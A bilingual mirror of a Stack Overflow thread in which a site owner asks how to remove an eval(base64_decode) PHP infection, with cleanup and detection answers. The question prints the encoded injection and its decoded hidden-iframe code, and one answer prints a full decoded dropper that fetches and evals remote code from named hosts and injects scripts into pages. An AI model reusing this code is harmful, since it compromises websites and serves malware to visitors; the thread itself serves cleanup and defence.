如何摆脱 eval-base64_decode 之类的 PHP 病毒文件?
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/5922762/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
How to get rid of eval-base64_decode like PHP virus files?
提问by fractalbit
My site (very large community website) was recently infected with a virus. Every index.phpfile was changed so that the opening php tag of these files it was changed to the following line:
我的网站(非常大的社区网站)最近感染了病毒。每个index.php文件都已更改,因此这些文件的打开 php 标记更改为以下行:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));
When I decoded this, it produced the following PHP code:
当我解码它时,它产生了以下 PHP 代码:
<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}
I've tried several things to clean the virus even restoring from a backup and the files get re-infected after a few minutes or hours. So can you please help me?
我已经尝试了几种方法来清除病毒,即使是从备份中恢复,几分钟或几小时后文件又会重新感染。那你能帮帮我吗?
What do you know about this virus?
你对这个病毒了解多少?
Is there a known security hole it uses to install and propagate?
是否存在用于安装和传播的已知安全漏洞?
What does the above php code actually does?
上面的php代码实际上做了什么?
What does the page it embeds in the iframe does?
它嵌入到 iframe 中的页面有什么作用?
And of course more importantly: What can i do to get rid of it?
当然更重要的是:我能做些什么来摆脱它?
Please help, we have been almost run out of ideas and hope :(
请帮助,我们几乎没有想法和希望:(
UPDATE1Some more details: A weird thing is: When we first checked the infected files. They were changed but their modified time in the ftp program was showing last access to be days, months or even years ago in some cases! How is this even possible? It drives me crazy!
UPDATE1更多细节:一件奇怪的事情是:当我们第一次检查受感染的文件时。它们被更改了,但它们在 ftp 程序中的修改时间显示上次访问是在某些情况下是几天、几个月甚至几年前!这怎么可能?它让我疯狂!
UPDATE 2I think the problem initiated after a user installed a plugin in his Wordpress installation. After restoring from backup and completely deleting the Wordpress folder and the associated db the problem seems gone. We have currently subscribed to a security service and they are investigating the issue just to be sure the hack is gone for good. Thanks for anyone who replied.
更新 2我认为问题是在用户在他的 Wordpress 安装中安装了插件后引发的。从备份恢复并完全删除 Wordpress 文件夹和关联的数据库后,问题似乎消失了。我们目前已经订阅了一项安全服务,他们正在调查这个问题,以确保黑客行为永远消失。感谢任何回答的人。
回答by Luke Stevenson
Steps to recover and disinfect your site (provided you have a known good backup).
恢复和消毒站点的步骤(前提是您有已知的良好备份)。
1) Shutdown the Site
1) 关闭网站
You need to basically close the door to your site before you do your remedial work. This will prevent visitors getting malicious code, seeing error messages, etc. Just good practice.
在进行补救工作之前,您需要基本上关闭站点的大门。这将防止访问者获得恶意代码、查看错误消息等。这是一种很好的做法。
You should be able to do this by putting the following into your .htaccessfile in the webroot. (Replace "!!Your IP Address Here!!" with your own IP address - see http://icanhazip.comif you don't know your IP address.)
您应该能够通过将以下内容放入webroot 中的.htaccess文件来完成此操作。(将“!!Your IP Address Here!!”替换为您自己的 IP 地址 -如果您不知道您的 IP 地址,请访问http://icanhazip.com。)
order deny,allow
deny from all
allow from !!Your IP Address Here!!
2) Download a Copy of All of your Files from the Server
2) 从服务器下载所有文件的副本
Download everything into a separate folder from your good backups. This may take a while (dependent on your site size, connection speed, etc).
将所有内容从您的良好备份下载到一个单独的文件夹中。这可能需要一段时间(取决于您的站点大小、连接速度等)。
3) Download and Install a File/Folder Comparison Utility
3) 下载并安装文件/文件夹比较实用程序
On a Windows machine, you can use WinMerge - http://winmerge.org/- it's free and quite powerful. On a MacOS machine, check out the list of possible alternates from Alternative.to
在 Windows 机器上,您可以使用 WinMerge - http://winmerge.org/- 它是免费且功能强大的。在 MacOS 机器上,从Alternative.to查看可能的替代列表
4) Run the File/Folder Comparison Utility
4) 运行文件/文件夹比较实用程序
You should end up with a few different results:
你应该得到几个不同的结果:
- Files are Identical - The current file is the same as your backup, and so is unaffected.
- File on Left/Right Side Only - That file either only exists in the backup (and may have been deleted from the server), or only exists on the server (and may have been injected/created by the hacker).
- File is Different - The file on the server is not the same as the one in the backup, so it may have been modified by you (to configure it for the server) or by the hacker (to inject code).
- 文件相同 - 当前文件与您的备份相同,因此不受影响。
- 仅左侧/右侧文件 - 该文件仅存在于备份中(并且可能已从服务器中删除),或者仅存在于服务器上(并且可能已被黑客注入/创建)。
- 文件不同 - 服务器上的文件与备份中的文件不同,因此它可能已被您(为服务器配置)或黑客(注入代码)修改。
5) Resolve the Differences
5)解决差异
(a.k.a "Why can't we all just get along?")
(又名“为什么我们不能好好相处?”)
For Files which are Identical, no further action is required. For Files which Exist on One Side Only, look at the file and figure out whether they are legitimate (ie user uploads which should be there, additional files you may have added, etc.) For Files which are Different, look at the file (the File Difference Utility may even show you which lines have been added/modified/removed) and see whether the server version is valid. Overwrite (with the backed-up version) any files which contain malicious code.
对于相同的文件,不需要进一步的操作。对于只存在于一侧的文件,查看文件并确定它们是否合法(即用户上传的应该存在的文件,您可能添加的其他文件等)对于不同的文件,查看文件(文件差异实用程序甚至可以向您显示已添加/修改/删除了哪些行)并查看服务器版本是否有效。覆盖(使用备份版本)任何包含恶意代码的文件。
6) Review your Security Precautions
6) 查看您的安全预防措施
Whether this is as simple as changing your FTP/cPanel Passwords, or reviewing your use of external/uncontrolled resources (as you mention you are performing alot of fgets, fopens, etc. you may want to check the parameters being passed to them as that is a way to make scripts pull in malicious code), etc.
这是否像更改您的 FTP/cPanel 密码一样简单,或者检查您对外部/不受控制的资源的使用(正如您提到的,您正在执行大量 fgets、fopens 等。您可能需要检查传递给它们的参数)是一种让脚本引入恶意代码的方法)等。
7) Check the Site Works
7) 检查现场工程
Take the opportunity of being the only person looking at the site to make sure that everything is still operating as expected, after the infected files are corrected and malicious files have been removed.
借此机会成为唯一查看站点的人,以确保在更正受感染的文件并删除恶意文件后,一切仍按预期运行。
8) Open the Doors
8) 打开门
Reverse the changes made in the .htaccessfile in Step 1. Watch carefully. Keep an eye on your visitor and error logs to see if anyone tries to trigger the removed malicious files, etc.
反转在步骤 1中对.htaccess文件所做的更改。仔细观察。密切关注您的访问者和错误日志,看看是否有人试图触发已删除的恶意文件等。
9) Consider Automated Detection Methods
9)考虑自动检测方法
There are a few solutions, allowing for you to have an automated check performed on your host (using a CRON job) which will detect and detail any changes which occur. Some are a bit verbose (you will get an email for each and every file changed), but you should be able to adapt them to your needs:
有几种解决方案,允许您在主机上执行自动检查(使用 CRON 作业),这将检测并详细说明发生的任何更改。有些有点冗长(对于每个更改的文件,您都会收到一封电子邮件),但您应该能够根据自己的需要调整它们:
- Tripwire - a PHP script to detect and report new, deleted or modified files
- Shell script to monitor file changes
- How to detect if your webserver is hacked and get alerted
10) Have Scheduled Backups, and Retain a Good Bracket
10)有计划的备份,并保留一个好的支架
Make sure you have scheduled backups performed on your website, keep a few of them, so you have different steps you can go back in time, if necessary. For instance, if you performed weekly backups, you might want to keep the following:
确保您已在您的网站上执行计划备份,保留其中一些,以便您可以在必要时及时返回不同的步骤。例如,如果您执行每周备份,您可能希望保留以下内容:
- 4 x Weekly Backups
- 4 x Monthly Backups (you retain one of the Weekly Backups, maybe the first week of the month, as the Monthly Backup)
- 4 次每周备份
- 4 x 每月备份(您保留其中一个每周备份,可能是每月的第一周,作为每月备份)
These will always make life easier if you have someone attack your site with something a bit more destructive than a code injection attack.
如果有人使用比代码注入攻击更具破坏性的东西来攻击您的网站,这些总是会让生活变得更轻松。
Oh, and ensure you backup your databases too - with alot of sites being based on CMSes, having the files is nice, but if you lose/corrupt the database behind them, well, the backups are basically useless.
哦,确保你也备份你的数据库 - 很多站点都基于 CMSes,拥有这些文件很好,但是如果你丢失/损坏了它们背后的数据库,那么备份基本上是无用的。
回答by Nick ODell
First, shut off your site until you can figure out how he got in and how to fix it. That looks like it's serving malware to your clients.
首先,关闭你的网站,直到你能弄清楚他是如何进入的以及如何修复它。这看起来像是在向您的客户提供恶意软件。
Next, search through your php files for fgets, fopen, fputs, eval, or system. I recommend notepad++ because of its "Find in Files" feature. Also, make sure that that's the only place your PHP has been modified. Do you have an offline copy to compare against?
接下来,在您的 php 文件中搜索 fgets、fopen、fputs、eval 或 system。我推荐记事本++,因为它具有“在文件中查找”功能。另外,请确保这是您的 PHP 被修改的唯一地方。你有离线副本可以比较吗?
回答by Erion Omeri
I suffered from the same hack job. I was able to decrypt the code as well, and while I got different php code, I started by removing the injected php text by looping through each php file in the site and removing the eval call. I am still investigating how I got it to begin with but here is what mine looked like after decrypting from this website:
我遭受了同样的黑客工作。我也能够解密代码,虽然我得到了不同的 php 代码,但我首先通过遍历站点中的每个 php 文件并删除 eval 调用来删除注入的 php 文本。我仍在调查我是如何开始使用它的,但这是我从这个网站解密后的样子:
To decode the encrypted php script on each php file use this: http://www.opinionatedgeek.com/dotnet/tools/base64decode/
要解码每个 php 文件上的加密 php 脚本,请使用:http: //www.opinionatedgeek.com/dotnet/tools/base64decode/
And formatting the result using this guy: http://beta.phpformatter.com/
并使用这个人格式化结果:http: //beta.phpformatter.com/
To clean you need to remove the "eval" line from the top of each php file, and delete the .log folders from the base folder of the website.
要清理,您需要从每个 php 文件的顶部删除“eval”行,并从网站的基本文件夹中删除 .log 文件夹。
I found a python script which I modified slightly to remove the trojan in php files so I will post it here for others to use: code source from thread: replace ALL instances of a character with another one in all files hierarchically in directory tree
我找到了一个 python 脚本,我稍微修改了它以删除 php 文件中的木马,所以我将它发布在这里供其他人使用:来自线程的代码源:在目录树中分层的所有文件中用另一个字符替换一个字符的所有实例
import os
import re
import sys
def try_to_replace(fname):
if replace_extensions:
return fname.lower().endswith(".php")
return True
def file_replace(fname, pat, s_after):
# first, see if the pattern is even in the file.
with open(fname) as f:
if not any(re.search(pat, line) for line in f):
return # pattern does not occur in file so we are done.
# pattern is in the file, so perform replace operation.
with open(fname) as f:
out_fname = fname + ".tmp"
out = open(out_fname, "w")
for line in f:
out.write(re.sub(pat, s_after, line))
out.close()
os.rename(out_fname, fname)
def mass_replace(dir_name, s_before, s_after):
pat = re.compile(s_before)
for dirpath, dirnames, filenames in os.walk(dir_name):
for fname in filenames:
if try_to_replace(fname):
print "cleaning: " + fname
fullname = os.path.join(dirpath, fname)
file_replace(fullname, pat, s_after)
if len(sys.argv) != 2:
u = "Usage: rescue.py <dir_name>\n"
sys.stderr.write(u)
sys.exit(1)
mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "")
to use type
使用类型
python rescue.py rootfolder
python resume.py 根文件夹
This is what the malicious script was trying to do:
这就是恶意脚本试图做的事情:
<?php
if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (!function_exists('mrobh')) {
function get_tds_777($url)
{
$content = "";
$content = @trycurl_777($url);
if ($content !== false)
return $content;
$content = @tryfile_777($url);
if ($content !== false)
return $content;
$content = @tryfopen_777($url);
if ($content !== false)
return $content;
$content = @tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = @trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777($url)
{
if (function_exists('file') === false)
return false;
$inc = @file($url);
$buf = @implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = @fopen($url, 'r');
if ($f) {
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = @fsockopen($host, 80, $errno, $errstr, 30);
if (!$f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function trysocket_777($url)
{
if (function_exists('socket_create') === false)
return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = @gethostbyname($host);
$ip2 = @long2ip(@ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!@socket_connect($sock, $ip1, 80)) {
@socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
@socket_close($sock);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function update_tds_file_777($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = @fopen($tdsfile, "w");
if ($f) {
@fwrite($f, $val);
@fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (@file_exists($tdsfile)) {
$mtime = @filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = @file_get_contents($tdsfile);
}
} else {
$content = update_tds_file_777($tdsfile);
}
$tds = @explode("\n", $content);
$c = @count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (!@is_dir($rz)) {
@mkdir($rz);
if (@is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (!@is_dir($rz)) {
@mkdir($rz);
if (@is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = base64_decode('http://ens122zzzddazz.com/');
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
$_SERVER['s_a2'] = base64_decode('http://nlinthewood.com/g_load.php') . $d;
$_SERVER['s_script'] = "nl.php?p=d";
}
setup_globals_777();
if (!function_exists('gml_777')) {
function gml_777()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
return $r_string_777;
}
}
if (!function_exists('gzdecodeit')) {
function gzdecodeit($decode)
{
$t = @ord(@substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = @unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = @gzinflate(@substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh($content)
{
@Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
ob_start('mrobh');
}
}
?>
回答by kenorb
To get rid of these malicious PHP you simply needs to remove them. If the file is infected, you need to remove only the part which looks suspicious.
要摆脱这些恶意 PHP,您只需删除它们。如果文件被感染,您只需删除看起来可疑的部分。
It's always tricky to find these files, because usually there are multiple of them across your web root.
找到这些文件总是很棘手,因为通常在您的 Web 根目录中有多个文件。
Usually if you see some kind of obfuscations, it's red alert for you.
通常,如果您看到某种混淆,这是对您的红色警报。
Most of the malwares are easy to find based on the common functions which they use, this includes:
大多数恶意软件很容易根据它们使用的常用功能找到,包括:
base64_decode,lzw_decompress,eval,- and so on
base64_decode,lzw_decompress,eval,- 等等
By using encoding format, they're compacting their size and make them more difficult to decode by non-experienced users.
通过使用编码格式,它们压缩了它们的大小并使它们更难以被没有经验的用户解码。
Here are few grepcommands which may find the most common malware PHP code:
以下是一些grep可以找到最常见的恶意软件 PHP 代码的命令:
grep -R return.*base64_decode .
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .
You can run these commands on the server or once you synchronised your website into your local machine (via FTP e.g. ncftpget -R).
您可以在服务器上运行这些命令,或者在您将网站同步到本地计算机后(例如通过 FTP ncftpget -R)运行这些命令。
Or use scan tools which are specially designed for finding that kind of malicious files, see: PHP security scanners.
或者使用专为查找此类恶意文件而设计的扫描工具,请参阅:PHP 安全扫描程序。
For education purposes, please find the following collection of PHP exploit scripts, found when investigating hacked servers available at kenorb/php-exploit-scripts GitHub(influenced by @Mattias original collection). This will give you understanding how these PHP suspicious files look like, so you can learn how to find more of them on your server.
出于教育目的,请在调查kenorb/php-exploit-scripts GitHub 上可用的被黑服务器时找到以下 PHP 漏洞利用脚本集合(受@Mattias 原始集合影响)。这将使您了解这些 PHP 可疑文件的外观,从而了解如何在您的服务器上找到更多可疑文件。
See also:
也可以看看:
回答by Radu
My websites / or websites I host were hit several times with similar attacks.
我的网站/或我托管的网站多次遭到类似攻击。
I present what I did to resolve the issue. I don't pretend it's the best / easiest approach but it works and since then I can proactively keep the ball in my field.
我介绍了我为解决问题所做的工作。我不会假装这是最好/最简单的方法,但它有效,从那时起我可以主动将球保持在我的领域。
solve the issue ASAP I created a very simple PHP script (it was written when the iron was hot so maybe it's not the most optimized code BUT it solves the problem pretty fast): http://www.ecommy.com/web-security/clean-php-files-from-eval-infection
make sure you know when something like this hits again. Hackers use all kind of aproaches from SQL injection of one of your external modules you install to brute force your admin panel with dictionary attacks or very well known password patterns like 1qaz... qwerty.... etc... I present the scripts here: http://www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections
the cron entry would be something like: 0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1&
尽快解决问题我创建了一个非常简单的 PHP 脚本(它是在熨斗很热时编写的,所以它可能不是最优化的代码,但它解决问题的速度非常快):http: //www.ecommy.com/web-security /clean-php-files-from-eval-infection
确保您知道此类事件何时再次发生。黑客使用 SQL 注入您安装的外部模块之一的各种方法,通过字典攻击或众所周知的密码模式(如 1qaz...在这里:http: //www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections
cron 条目类似于:0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1&
I updated the pages so someone can download directly the files. Hope it will he useful for you as it's for me :)
我更新了页面,以便有人可以直接下载文件。希望他对你有用,就像对我一样:)
回答by reflexiv
Ensure any popular web applications like Wordpress or vBulletin are updated. There are many exploits with the old versions that can lead to your server getting compromised and it will probably happen again if they are not updated. No use in proceeding until this is done.
If the files keep getting replaced then there is a rootkit or trojan running in the background. That file cannot replicate itself. You will have to get rid of the rootkit first. Try rkhunter, chkrootkit, and LMD. Compare the output of
ps auxto a secured server and check/var/tmpand/tmpfor suspicious files. You might have to reinstall the OS.Ensure all workstations administrating the server are up to date and clean. Do not connect via insecure wireless connections or use plain text authentication like with FTP (use SFTP instead). Only log into control panels with https.
To prevent this from happening again run csfor comparable firewall, daily LMDscans, and stay current with the latest security patches for all applications on the server.
确保更新所有流行的 Web 应用程序,例如 Wordpress 或 vBulletin。旧版本有许多漏洞可能会导致您的服务器受到威胁,如果不更新,这种情况可能会再次发生。在这完成之前,继续进行是没有用的。
如果文件不断被替换,则说明有一个 rootkit 或特洛伊木马在后台运行。该文件无法自我复制。您必须首先摆脱rootkit。尝试rkhunter、chkrootkit和LMD。输出比较
ps aux到安全服务器,并检查/var/tmp和/tmp可疑文件。您可能需要重新安装操作系统。确保管理服务器的所有工作站都是最新且干净的。不要通过不安全的无线连接进行连接或使用像 FTP 一样的纯文本身份验证(改用 SFTP)。仅使用 https 登录控制面板。
回答by trm
Assuming this is a Linux-based server and you have SSH access, you could run this to remove the offending code:
假设这是一个基于 Linux 的服务器并且你有 SSH 访问权限,你可以运行它来删除有问题的代码:
find . -name "*.php" | xargs sed -i 's@eval[ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;@@'
This covers all known base64 implementations, and will work whether the base64 text is surrounded by single or double quotes
这涵盖了所有已知的 base64 实现,并且无论 base64 文本被单引号还是双引号包围都可以使用
EDIT: now works with internal whitespace also
编辑:现在也适用于内部空白
